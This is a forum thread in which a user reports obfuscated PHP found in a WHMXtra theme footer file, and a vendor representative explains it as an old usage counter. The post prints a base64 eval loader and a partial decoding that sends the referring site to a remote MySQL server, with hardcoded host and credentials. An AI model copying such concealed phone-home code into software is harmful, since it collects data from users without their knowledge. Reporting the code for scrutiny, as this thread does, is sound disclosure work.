Malware / Backdoor

[xz3r0]

Hello, I seam to have found some malware on my new install of WHMXtra.
Hello, I seam to have found some malware on my new install of WHMXtra.
$_F=__FILE__;$_X='Pz48P3BocA0KICAvLyBiMWNrIHRyMWNr NG5nIFxcDQokZGJfaDJzdCA9ICJlOS45by5lOC43aSI7IC8vIE gyc3QsIDNzMzFsbHkgbDJjMWxoMnN0IA0KJGRiXzNzNXIgPSAi ZHdzNHQ1Y2hfc3QxdDNzIjsgLy8gWTIzciBkMXQxYjFzNSAzcz VybjFtNSANCiRkYl9wMXNzID0gInN0MXQzcyI7IC8vWTIzciBk MXQxYjFzNSBwMXNzdzJyZCANCiRkYl9uMW01ID0gImR3czR0NW NoX3N0MXQzcyI7IC8vIFkyM3IgZDF0MWIxczUgbjFtNSANCiRk YiA9IG15c3FsX2Mybm41Y3QoJGRiX2gyc3QsJGRiXzNzNXIsJG RiX3Axc3MpOw0KJHJoMnN0ZzV0PWc1dDVudigiSFRUUF9SRUZF UkVSIik7DQpteXNxbF9zNWw1Y3RfZGIgKCRkYl9uMW01KSAyci BkNDUgKCJDMW5uMnQgYzJubjVjdCB0MiBkMXQxYjFzNSIpOw0K JHI1czNsdD0iSU5TRVJUIElOVE8gc3QxdDNzICg0ZCx3NWJzNH Q1LHQ0bTVkMXQ1KSBWQUxVRVMgKCdOVUxMJywgJyRyaDJzdGc1 dCcsIG4ydygpKSI7IC8vSW5zNXJ0IHRoNSB2MWwzNXMgNG50Mi B0aDUgYzJycjVjdCBkMXQxYjFzNQ0KbXlzcWxfcTM1cnkoJHI1 czNsdCkgMnIgZDQ1KG15c3FsXzVycjJyKCkpOw0KPz4=';eval (base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1 g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2 Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0 YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='


// back tracking \\
$db_host = "69.93.68.75"; // Host, usually localhost
$db_user = "dwsitech_status"; // Your database username
$db_pass = "status"; //Your database password
$db_name = "dwsitech_status"; // Your database name
$db = mysql_connect($db_host,$db_user,$db_pass);
$rhostget=getenv("HTTP_REFERER");
mysql_select_db ($db_name) or die ("Cannot connect to database");
...............


LOCATED IN /usr/local/cpanel/whostmgr/docroot/themes/x/xtra/megamon/footer.php
LOCATED IN /usr/local/cpanel/whostmgr/docroot/themes/x/xtra/megamon/footer.php

[Bora]

Originally that code was included by one of our coders to see how many
of our customers were using that feature and whether it was worth
developing it in the future. The code is no longer relevant and will be
removed as it hasn't been needed since 2009 and we no longer do
trackbacks.


It is not malware or a backdoor. It simply sends a call to a no longer
existing website that set a counter so we could determine how many
people used the feature. It will be removed in the next update.

[xz3r0]

Hello Bora;

Yes this was clarified in an email with one of the admins of WHMXtra a while ago; My apologies for not updating the forum thread.

[Bora]

No problem at all, I just wanted to update the thread, just in case there were other people reading the thread.